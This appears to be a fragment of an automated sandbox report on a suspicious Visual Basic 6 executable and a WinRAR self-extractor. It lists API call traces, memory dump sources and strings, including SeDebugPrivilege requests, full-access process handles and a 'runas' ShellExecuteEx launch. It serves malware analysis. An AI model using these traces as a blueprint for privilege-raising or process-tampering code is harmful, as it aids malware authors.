                                                                                                                                                            • __vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000,?,?,004025E6), ref: 0040ADC7
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,004025E6), ref: 0040ADD2
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,00000000,80000002,00000000,?,?,004025E6), ref: 0040ADED
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$FreeList$ChkstkError
                                                                                                                                                            • String ID: RO$Once
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,?,004100E0), ref: 00410C8E
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,00000000,6CEBD8B1,6CEBDF85,00000000,004025E6), ref: 00410CBE
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60 ref: 00410CD3
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000028,?), ref: 00410CEB
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000,?,0000001C,?,0000001C), ref: 00410D3B
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,SeDebugPrivilege,?), ref: 00410D5A
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,00000000), ref: 00410D6B
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00410D83
                                                                                                                                                            • __vbaCopyBytes.MSVBVM60(00000008,?,?), ref: 00410DE0
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?), ref: 00410E35
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$System$AnsiBytesChkstkCopyFree
                                                                                                                                                            • String ID: SeDebugPrivilege
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 00418A2E
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00418A5B
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00418A67
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF), ref: 00418A76
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,?), ref: 00418A8F
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 00418A9F
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00418AAD
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00418AB6
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?), ref: 00418ACB
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 00418ADB
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00418AE9
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00418AF2
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?), ref: 00418B08
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00418B32), ref: 00418B22
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00418B2B
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$ErrorFree$System$AnsiCopyUnicode$Chkstk
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(6CEBD8B1,6CEAA323,00000000), ref: 0040FFAA
                                                                                                                                                            • #537.MSVBVM60(00000000,?,00000001), ref: 0040FFBD
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040FFCA
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000000,00000000), ref: 0040FFCE
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 0040FFE2
                                                                                                                                                            • #537.MSVBVM60(00000000,?,00000001), ref: 0040FFF5
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040FFFC
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000000,00000000), ref: 00410001
                                                                                                                                                            • #616.MSVBVM60(?,-00000001), ref: 00410011
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0041001C
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00410021
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0041002D
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(0041005D), ref: 00410056
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 00410073
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$FreeMove$#537Copy$#616ErrorOverflow
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,-00000001,00000000,6CEBD8B1,00000000,6CEB2523), ref: 0041975B
                                                                                                                                                            • __vbaAryLock.MSVBVM60(?,00000000), ref: 00419775
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00419796
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 004197A5
                                                                                                                                                            • __vbaAryLock.MSVBVM60(?,?), ref: 004197B2
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 004197CD
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 004197D6
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,00000000,00000000), ref: 004197F9
                                                                                                                                                            • __vbaAryUnlock.MSVBVM60(?), ref: 00419809
                                                                                                                                                            • __vbaAryUnlock.MSVBVM60(?), ref: 0041980F
                                                                                                                                                            • __vbaPutOwner3.MSVBVM60(00407524,?,00000000), ref: 00419822
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?,0041984F,6CEBD8B1,00000000,6CEB2523), ref: 00419848
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60(00000000,6CEBD8B1,00000000,6CEB2523), ref: 00419860
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$BoundsGenerate$LockUnlock$DestructOverflowOwner3RedimSystem
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(?,004025E6,?,?,?,?,?,?,?,?,004025E6), ref: 0041057E
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 004105AE
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(001F03FF,00000000,00000000,?,?,?,?,004025E6), ref: 004105E8
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000), ref: 00410611
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000), ref: 00410627
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000004,00000000,?,?,?,?,004025E6), ref: 00410645
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,0041B1D4,?,?,?,?,004025E6), ref: 0041067E
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(001F03FF,00000000,00000000,?,?,?,?,004025E6), ref: 004106D3
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000), ref: 004106FC
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000), ref: 00410712
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,0041B1D4,?,?,?,?,004025E6), ref: 00410735
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,004025E6), ref: 00410758
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,0040BC66,0041B038,?,?,?,004025E6), ref: 00410E7E
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 00410EAE
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00410EC5
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,?,?,?,?,00000000,004025E6), ref: 00410ED1
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(0041B038,?,?,?,?,?,00000000,004025E6), ref: 00410EDF
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 00410EE8
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,00000000,00000000,00000000,?,?,?,?,00000000,004025E6), ref: 00410F03
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,00000000,00000000,?,?,?,?,00000000,004025E6), ref: 00410F14
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,?,00000000,004025E6), ref: 00410F25
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(0041B038,?,?,?,?,?,00000000,004025E6), ref: 00410F33
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(00000000,?,?,?,?,?,00000000,004025E6), ref: 00410F41
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,?,00000000,004025E6), ref: 00410F57
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(0040AA6C,004025E6,0040AA6C,?,?,?,00000000,004025E6), ref: 0040FA6E
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,0040AA6C,004025E6,0040AA6C), ref: 0040FA9E
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 0040FABD
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 0040FACA
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000120,000000FF,?), ref: 0040FAE9
                                                                                                                                                            • #570.MSVBVM60(?), ref: 0040FAFB
                                                                                                                                                            • #525.MSVBVM60(00000000), ref: 0040FB02
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040FB0D
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,?), ref: 0040FB25
                                                                                                                                                            • __vbaFileClose.MSVBVM60(?), ref: 0040FB37
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0040FB4A
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(0040FB7E), ref: 0040FB77
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6), ref: 0040CF8E
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,00000000,004025E6), ref: 0040CFD5
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 0040D006
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406C48,0000004C), ref: 0040D039
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 0040D078
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D0C1
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406C48,00000040), ref: 0040D0F9
                                                                                                                                                            • __vbaLateIdCall.MSVBVM60(?,60030004,00000000), ref: 0040D11C
                                                                                                                                                            • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040D12F
                                                                                                                                                            • __vbaCastObj.MSVBVM60(00000000,0040563C), ref: 0040D152
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040D15D
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405414,00000730), ref: 0040D190
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 0040D1AB
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(?,004025E6), ref: 0040E58E
                                                                                                                                                            • __vbaObjSetAddref.MSVBVM60(?,00000000,?,?,?,?,004025E6), ref: 0040E5D4
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040E5E3
                                                                                                                                                            • __vbaVarVargNofree.MSVBVM60(?,?,?,?,004025E6), ref: 0040E5F6
                                                                                                                                                            • __vbaStrErrVarCopy.MSVBVM60(00000000,?,?,?,?,004025E6), ref: 0040E5FD
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,004025E6), ref: 0040E608
                                                                                                                                                            • __vbaChkstk.MSVBVM60 ref: 0040E620
                                                                                                                                                            • __vbaRaiseEvent.MSVBVM60(?,00000001,00000001), ref: 0040E646
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,004025E6), ref: 0040E652
                                                                                                                                                            • __vbaFreeObj.MSVBVM60(0040E67A,?,?,?,?,?,?,004025E6), ref: 0040E673
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001), ref: 0040CC8C
                                                                                                                                                            • __vbaNew2.MSVBVM60(004055D8,0041B8D8), ref: 0040CCA4
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040CCC7
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406C48,00000040), ref: 0040CCEB
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,?), ref: 0040CD02
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004055C8,0000000C), ref: 0040CD18
                                                                                                                                                            • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040CD28
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 0040CD31
                                                                                                                                                            APIs
                                                                                                                                                            • _adj_fdiv_m64.MSVBVM60(6CEBD83C,00000000), ref: 00414DCE
                                                                                                                                                            • __vbaR8IntI4.MSVBVM60(h#@,6CEBD83C,00000000), ref: 00414DE2
                                                                                                                                                            • _adj_fdiv_m64.MSVBVM60 ref: 00414E27
                                                                                                                                                            • __vbaR8IntI4.MSVBVM60 ref: 00414E32
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaRedim.MSVBVM60(00000080,00000001,0041B108,00000011,00000001,00000FFF,00000000,00000000,00419504), ref: 00418E5D
                                                                                                                                                            • __vbaGetOwner3.MSVBVM60(00407524,0041B108,00000000), ref: 00418E78
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00418E9A
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00418EAA
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(00000000,00419504), ref: 00418EE6
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(00000000,00419504), ref: 00418EFC
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60(00000000,00419504), ref: 00418F21
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001,?,?,?,?,?,?,?,?,004025E6), ref: 0040E6EA
                                                                                                                                                            • __vbaCastObj.MSVBVM60(00000000,004071DC,?,?,?,?,?,?,?,?,004025E6), ref: 0040E6F8
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,004025E6), ref: 0040E703
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007C4,?,?,?,?,?,?,?,?,004025E6), ref: 0040E723
                                                                                                                                                            • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,004025E6), ref: 0040E72C
                                                                                                                                                            • __vbaRaiseEvent.MSVBVM60(?,00000002,00000000,?,?,?,?,?,?,?,?,004025E6), ref: 0040E736
                                                                                                                                                            • __vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,004025E6), ref: 0040E73F
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 00417458
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?,004174A7), ref: 0041747C
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00417484
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041748C
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00417494
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041749C
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004174A4
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 0041887E
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?,004188CD), ref: 004188A2
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004188AA
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004188B2
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004188BA
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004188C2
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 004188CA
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6), ref: 0041009E
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,00000000,6CEBD8B1,6CEBDF85,00000000,004025E6), ref: 004100CE
                                                                                                                                                              • Part of subcall function 00410C70: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,?,004100E0), ref: 00410C8E
                                                                                                                                                              • Part of subcall function 00410C70: __vbaOnError.MSVBVM60(000000FF,00000000,6CEBD8B1,6CEBDF85,00000000,004025E6), ref: 00410CBE
                                                                                                                                                              • Part of subcall function 00410C70: __vbaSetSystemError.MSVBVM60 ref: 00410CD3
                                                                                                                                                              • Part of subcall function 00410C70: __vbaSetSystemError.MSVBVM60(?,00000028,?), ref: 00410CEB
                                                                                                                                                              • Part of subcall function 00410C70: __vbaSetSystemError.MSVBVM60(?,00000000,?,0000001C,?,0000001C), ref: 00410D3B
                                                                                                                                                              • Part of subcall function 00410C70: __vbaSetSystemError.MSVBVM60(?), ref: 00410E35
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(001F0FFF,00000000), ref: 004100FC
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?), ref: 0041011C
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?), ref: 00410139
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?), ref: 00410155
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001,?,?,?,?,?,?,?,?,004025E6), ref: 0040E7BF
                                                                                                                                                            • __vbaCastObj.MSVBVM60(00000000,004071DC,?,?,?,?,?,?,?,?,004025E6), ref: 0040E7CD
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,004025E6), ref: 0040E7D8
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007C4,?,?,?,?,?,?,?,?,004025E6), ref: 0040E7F8
                                                                                                                                                            • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,004025E6), ref: 0040E801
                                                                                                                                                            • __vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,004025E6), ref: 0040E807
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 00419681
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000), ref: 0041968B
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 00419694
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(004196D8), ref: 004196CB
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 004196D0
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 004196D5
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001,?,x$@,?,?,?,?,?,00000000,004025E6), ref: 004189B6
                                                                                                                                                            • __vbaExitProc.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 004189E7
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 00418A02
                                                                                                                                                            Strings
                                                                                                                                                            • String ID: XuA$x$@
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001,?,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 0040E295
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007BC), ref: 0040E2BA
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,004071CC,00000094), ref: 0040E2E4
                                                                                                                                                            • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 0040E2F3
                                                                                                                                                            • __vbaExitProc.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 0040E2F9

                                                                                                                                                            Execution Graph

                                                                                                                                                            Execution Coverage:6.6%
                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                            Signature Coverage:15.5%
                                                                                                                                                            Total number of Nodes:796
                                                                                                                                                            Total number of Limit Nodes:39
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog.LIBCMT ref: 008FB7E5
                                                                                                                                                              • Part of subcall function 008E1316: GetDlgItem.USER32(00000000,00003021), ref: 008E135A
                                                                                                                                                              • Part of subcall function 008E1316: SetWindowTextW.USER32(00000000,009135F4), ref: 008E1370
                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 008FB8D1
                                                                                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008FB8EF
                                                                                                                                                            • IsDialogMessageW.USER32(?,?), ref: 008FB902
                                                                                                                                                            • TranslateMessage.USER32(?), ref: 008FB910
                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 008FB91A
                                                                                                                                                            • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 008FB93D
                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 008FB960
                                                                                                                                                            • GetDlgItem.USER32(?,00000068), ref: 008FB983
                                                                                                                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 008FB99E
                                                                                                                                                            • SendMessageW.USER32(00000000,000000C2,00000000,009135F4), ref: 008FB9B1
                                                                                                                                                              • Part of subcall function 008FD453: _wcslen.LIBCMT ref: 008FD47D
                                                                                                                                                            • SetFocus.USER32(00000000), ref: 008FB9B8
                                                                                                                                                            • _swprintf.LIBCMT ref: 008FBA24
                                                                                                                                                              • Part of subcall function 008FD4D4: GetDlgItem.USER32(00000068,?), ref: 008FD4E8
                                                                                                                                                              • Part of subcall function 008FD4D4: ShowWindow.USER32(00000000,00000005,?,?), ref: 008FD510
                                                                                                                                                              • Part of subcall function 008FD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 008FD51B
                                                                                                                                                              • Part of subcall function 008FD4D4: SendMessageW.USER32(00000000,000000C2,00000000,009135F4), ref: 008FD529
                                                                                                                                                              • Part of subcall function 008FD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 008FD53F
                                                                                                                                                              • Part of subcall function 008FD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 008FD559
                                                                                                                                                              • Part of subcall function 008FD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 008FD59D
                                                                                                                                                              • Part of subcall function 008FD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 008FD5AB
                                                                                                                                                              • Part of subcall function 008FD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 008FD5BA
                                                                                                                                                              • Part of subcall function 008FD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 008FD5E1
                                                                                                                                                              • Part of subcall function 008FD4D4: SendMessageW.USER32(00000000,000000C2,00000000,009143F4), ref: 008FD5F0
                                                                                                                                                            • _swprintf.LIBCMT ref: 008FBAC2
                                                                                                                                                            • _swprintf.LIBCMT ref: 008FBB7C
                                                                                                                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 008FBC6F
                                                                                                                                                            • _swprintf.LIBCMT ref: 008FBD1E
                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 008FBD7D
                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000065,009135F4), ref: 008FBD94
                                                                                                                                                            • GetDlgItem.USER32(?,00000065), ref: 008FBD9D
                                                                                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 008FBDAC
                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 008FBDBB
                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 008FBE68
                                                                                                                                                            • _wcslen.LIBCMT ref: 008FBEBE
                                                                                                                                                            • _swprintf.LIBCMT ref: 008FBEE8
                                                                                                                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 008FBF32
                                                                                                                                                            • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 008FBF4C
                                                                                                                                                            • GetDlgItem.USER32(?,00000068), ref: 008FBF55
                                                                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 008FBF6B
                                                                                                                                                            • GetDlgItem.USER32(?,00000066), ref: 008FBF85
                                                                                                                                                            • SetWindowTextW.USER32(00000000,0092A472), ref: 008FBFA7
                                                                                                                                                            • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 008FC007
                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 008FC01A
                                                                                                                                                            • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 008FC0BD
                                                                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 008FC197
                                                                                                                                                            • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 008FC1D9
                                                                                                                                                              • Part of subcall function 008FC73F: __EH_prolog.LIBCMT ref: 008FC744
                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 008FC1FD
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message$ItemSend$Text$Window$_swprintf$DialogH_prologLong_wcslen$CallbackDispatchDispatcherEnableExecuteFocusParamShellShowTranslateUser
                                                                                                                                                            • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$runas$winrarsfxmappingfile.tmp
                                                                                                                                                            • API String ID: 1645173463-1271227274
                                                                                                                                                            • Opcode ID: 7f7461bd5a9832fb55ec8957bf65d181706d38fbd16d4a07e1e3e65733c1b6c3
